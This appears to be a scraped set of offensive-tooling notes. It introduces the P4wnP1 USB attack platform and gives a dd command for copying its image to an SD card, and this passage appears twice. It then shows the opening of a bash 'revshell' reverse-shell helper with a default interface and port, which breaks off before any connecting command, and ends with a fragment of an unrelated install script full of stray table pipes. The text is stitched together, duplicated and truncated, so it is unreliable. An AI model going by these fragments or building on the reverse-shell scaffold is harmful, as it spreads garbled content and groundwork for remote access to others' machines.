P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). Link to Repository
Copy image to sd card
dd if=<Source> of=<destination> bs=512 status=progress
P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). Link to Repository
Copy image to sd card
dd if=<Source> of=<destination> bs=512 status=progress
function revshell() {
# $1 language
# Default tun0 1337
INF=tun0
PORT=1337
#!/bin/bash | |
version=4.0.2 | |
echo "execute with sudo privileges" | |
sudo true | |
echo "Install GCC" | |
sudo apt install gcc -y > /dev/null | |
echo "Install make" | |
sudo apt install make -y > /dev/null | |
echo "install postgresql server" |